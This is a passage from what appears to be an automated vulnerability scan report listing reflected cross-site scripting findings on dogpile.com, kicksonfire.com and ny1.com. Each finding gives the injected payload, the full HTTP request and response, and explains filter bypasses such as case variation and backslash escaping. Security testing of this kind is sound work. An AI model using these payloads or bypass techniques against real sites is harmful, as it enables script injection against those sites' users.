<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
, more";
var addthis_offset_top = 20;
var addthis_hover_delay = 0;
var addthis_append_data = true;
var addthis_share_url = 'http://www.dogpile.com/info.dogpl.rss/Web96402\\';alert(1)//a2498f1a00b/';
var callback_server_url = 'http://www.dogpile.com/clickcallbackserver/_iceUrlFlag=1?0=&1=0&4=173.193.214.243&5=173.193.214.243&9=3bbca414522d42f7bc54c16a3af0cb01&10=1&11=info.dogpl.other&1
...[SNIP]...

2.93. http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11 [icePage%24SearchBoxTop%24qcat parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/redir/_iceUrlFlag=11

Issue detail

The value of the icePage%24SearchBoxTop%24qcat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d72e6\'%3b75d0d1bef7c was submitted in the icePage%24SearchBoxTop%24qcat parameter. This input was echoed as d72e6\\';75d0d1bef7c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /dogpile_other/ws/redir/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11?_IceUrl=true
Content-Length: 2186
Cache-Control: max-age=0
Origin: http://www.dogpile.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:12 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=859dec9ca7a74a60921ac16a3af0cb01&ActionId=fabc047e90564b3caea8c16a3af0cb01&CookieDomain=.dogpile.com

__VIEWSTATE=%2FwEPDwULLTEwNzYxNjAxNjBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYGBR5pY2VQYWdlJFNlYXJjaEJveFRvcCRxa3dzdWJtaXQFLmljZVBhZ2UkU2VhcmNoQm94VG9wJEFkdmFuY2VkU2VhcmNoV2ViJGluY2x1ZGUFLmljZV
...[SNIP]...
iifX%2BBAKw%2FZDRAQIteqHnA3ZhIp9VQNtHLGXL2pUo&icePage%24SearchBoxTop%24qkw=site%3Axss.cx&icePage%24SearchBoxTop%24qkwsubmit.x=0&icePage%24SearchBoxTop%24qkwsubmit.y=0&icePage%24SearchBoxTop%24qcat=Webd72e6\'%3b75d0d1bef7c&icePage%24SearchBoxTop%24rfcid=417&icePage%24SearchBoxTop%24rfcp=&icePage%24SearchBoxTop%24qlnk=0&icePage%24SearchBoxTop%24AdvancedSearchWeb%24advnames=qall%2Cqphrase%2Cqany%2Cqnot%2Clang%2Cqafter%2C
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=a63d211eee26414d9dd7c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:58 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:58 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:58 GMT; path=/
Set-Cookie: wsTemp=bigIP+3775436042.20480.0000+cacheId+ms19:1301677091189; path=/
Set-Cookie: wsRecent=site%3axss.cx,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:58 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 64952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
, more";
var addthis_offset_top = 20;
var addthis_hover_delay = 0;
var addthis_append_data = true;
var addthis_share_url = 'http://www.dogpile.com/info.dogpl.rss/Webd72e6\\';75d0d1bef7c/site%3axss.cx';
var callback_server_url = 'http://www.dogpile.com/clickcallbackserver/_iceUrlFlag=1?0=&1=0&4=173.193.214.243&5=173.193.214.243&9=a63d211eee26414d9dd7c16a3af0cb01&10=1&11=info.
...[SNIP]...

2.94. http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11 [qcat parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/redir/_iceUrlFlag=11

Issue detail

The value of the qcat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc191</ScRiPt%20>b4d651e87b1 was submitted in the qcat parameter. This input was echoed as dc191</ScRiPt >b4d651e87b1 in the application's response.

This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /dogpile_other/ws/redir/_iceUrlFlag=11?_IceUrl=true&qcat=dc191</ScRiPt%20>b4d651e87b1 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=88a9cb4e452045dfbbd8c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:37 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:37 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:37 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:37 GMT
Connection: close
Content-Length: 45962
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
pon, more";
var addthis_offset_top = 20;
var addthis_hover_delay = 0;
var addthis_append_data = true;
var addthis_share_url = 'http://www.dogpile.com/info.dogpl.rss/Dc191</Script >B4d651e87b1/';
var callback_server_url = 'http://www.dogpile.com/clickcallbackserver/_iceUrlFlag=1?0=&1=0&4=173.193.214.243&5=173.193.214.243&9=88a9cb4e452045dfbbd8c16a3af0cb01&10=1&11=info.dogpl.other&1
...[SNIP]...

2.95. http://www.dogpile.com/dogpile_rss/ws/redir/_iceUrlFlag=11 [qcat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_rss/ws/redir/_iceUrlFlag=11

Issue detail

The value of the qcat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdc14</script><script>alert(1)</script>bc3b9419cd was submitted in the qcat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /dogpile_rss/ws/redir/_iceUrlFlag=11?_IceUrl=true&qcat=bdc14</script><script>alert(1)</script>bc3b9419cd HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=c64a3d65c7ff4b7dbcdfc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:09 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:09 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:09 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:08 GMT
Connection: close
Content-Length: 45875
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
pon, more";
var addthis_offset_top = 20;
var addthis_hover_delay = 0;
var addthis_append_data = true;
var addthis_share_url = 'http://www.dogpile.com/info.dogpl.rss/Bdc14</Script><Script>Alert(1)</Script>Bc3b9419cd/';
var callback_server_url = 'http://www.dogpile.com/clickcallbackserver/_iceUrlFlag=1?0=&1=0&4=173.193.214.243&5=173.193.214.243&9=c64a3d65c7ff4b7dbcdfc16a3af0cb01&10=1&11=info.dogpl.rss&14=
...[SNIP]...

2.96. http://www.dogpile.com/dogpile_rss/ws/redir/_iceUrlFlag=11 [qcat parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_rss/ws/redir/_iceUrlFlag=11

Issue detail

The value of the qcat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d46d\'%3b6b7e482d682 was submitted in the qcat parameter. This input was echoed as 1d46d\\';6b7e482d682 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /dogpile_rss/ws/redir/_iceUrlFlag=11?qcat=1d46d\'%3b6b7e482d682&qkw=Go%20Daddy%20CEO%20Elephant&qcoll=relevance&zoom=off&bepersistence=true&newtxn=false&qi=21&qk=20&page=2&_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=a7dbe50ac6c642a88691c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:25 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:25 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:25 GMT; path=/
Set-Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; path=/
Set-Cookie: wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:25 GMT
Connection: close
Content-Length: 103613
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
pon, more";
var addthis_offset_top = 20;
var addthis_hover_delay = 0;
var addthis_append_data = true;
var addthis_share_url = 'http://www.dogpile.com/info.dogpl.rss/1d46d\\';6b7e482d682/Go+Daddy+CEO+Elephant';
var callback_server_url = 'http://www.dogpile.com/clickcallbackserver/_iceUrlFlag=1?0=&1=0&4=173.193.214.243&5=173.193.214.243&9=a7dbe50ac6c642a88691c16a3af0cb01&10=1&
...[SNIP]...

2.97. http://www.dogpile.com/dogpile_rss/ws/redir/_iceUrlFlag=11 [qcat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_rss/ws/redir/_iceUrlFlag=11

Issue detail

The value of the qcat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c5ea\'%3balert(1)//e445c104ee1 was submitted in the qcat parameter. This input was echoed as 6c5ea\\';alert(1)//e445c104ee1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /dogpile_rss/ws/redir/_iceUrlFlag=11?rfcp=TopNavigation&rfcid=407&qcat=Web6c5ea\'%3balert(1)//e445c104ee1&qkw=MLB%20Schedule&newtxn=false&qcoll=Relevance&_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=fe86ba7b839e447e97c1c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:34 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:34 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:34 GMT; path=/
Set-Cookie: wsTemp=bigIP+3725104394.20480.0000+cacheId+ms16:1301677190970; path=/
Set-Cookie: wsRecent=MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:34 GMT
Connection: close
Content-Length: 145639
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
, more";
var addthis_offset_top = 20;
var addthis_hover_delay = 0;
var addthis_append_data = true;
var addthis_share_url = 'http://www.dogpile.com/info.dogpl.rss/Web6c5ea\\';Alert(1)//E445c104ee1/MLB+Schedule';
var callback_server_url = 'http://www.dogpile.com/clickcallbackserver/_iceUrlFlag=1?0=&1=0&4=173.193.214.243&5=173.193.214.243&9=fe86ba7b839e447e97c1c16a3af0cb01&10=1&11=info.d
...[SNIP]...

2.98. http://www.kicksonfire.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kicksonfire.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4dbf7</script><script>alert(1)</script>4eeb72bba5c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4dbf7</script><script>alert(1)</script>4eeb72bba5c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kicksonfire.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 01 Apr 2011 16:21:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Pingback: http://www.kicksonfire.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.4b
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 16:21:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 21954


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org
...[SNIP]...
<script>
COMSCORE.beacon({
c1:2,
c2:6685975,
c3:"",
c4:"www.kicksonfire.com/favicon.ico4dbf7</script><script>alert(1)</script>4eeb72bba5c",
c5:"",
c6:"",
c15:""
});
</script>
...[SNIP]...

2.99. http://www.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ny1.com
Path:   /App_Skins/news1/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb45a'%3b3be91b1fed6 was submitted in the REST URL parameter 1. This input was echoed as cb45a';3be91b1fed6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /App_Skinscb45a'%3b3be91b1fed6/news1/favicon.ico HTTP/1.1
Host: www.ny1.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:10:53 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56055
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:20:57 GMT
Date: Fri, 01 Apr 2011 18:10:57 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?404;http://www.ny1.com:80/App_Skinscb45a';3be91b1fed6/news1/favicon.ico'; var gRegionSelected = '1';//]]>
...[SNIP]...

2.100. http://www.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ny1.com
Path:   /App_Skins/news1/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9307'%3b60ed35259b0 was submitted in the REST URL parameter 2. This input was echoed as b9307';60ed35259b0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /App_Skins/news1b9307'%3b60ed35259b0/favicon.ico HTTP/1.1
Host: www.ny1.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:04 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56061
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:21:09 GMT
Date: Fri, 01 Apr 2011 18:11:09 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?404;http://www.ny1.com:80/App_Skins/news1b9307';60ed35259b0/favicon.ico'; var gRegionSelected = '1';//]]>
...[SNIP]...

2.101. http://www.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ny1.com
Path:   /App_Skins/news1/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90922'%3b84586baa9ee was submitted in the REST URL parameter 3. This input was echoed as 90922';84586baa9ee in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /App_Skins/news1/favicon.ico90922'%3b84586baa9ee HTTP/1.1
Host: www.ny1.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:15 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56154
Vary: Accept-Encoding
Cache-Control: public, max-age=594
Expires: Fri, 01 Apr 2011 18:21:10 GMT
Date: Fri, 01 Apr 2011 18:11:16 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/App_Skins/news1/favicon.ico90922';84586baa9ee/default.aspx'; var gRegionSelected = '1';//]]>
...[SNIP]...

2.102. http://www.ny1.com/Content/ServeContent.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ny1.com
Path:   /Content/ServeContent.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 741cc'%3b7ff253c1040 was submitted in the REST URL parameter 1. This input was echoed as 741cc';7ff253c1040 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Content741cc'%3b7ff253c1040/ServeContent.aspx?id=694&ticks=810228 HTTP/1.1
Host: www.ny1.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:10:30 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56103
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:20:35 GMT
Date: Fri, 01 Apr 2011 18:10:35 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/Content741cc';7ff253c1040/ServeContent.aspx'; var gRegionSelected = '1';//]]>
...[SNIP]...

2.103. http://www.ny1.com/Content/ServeContent.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ny1.com
Path:   /Content/ServeContent.aspx

Issue detail

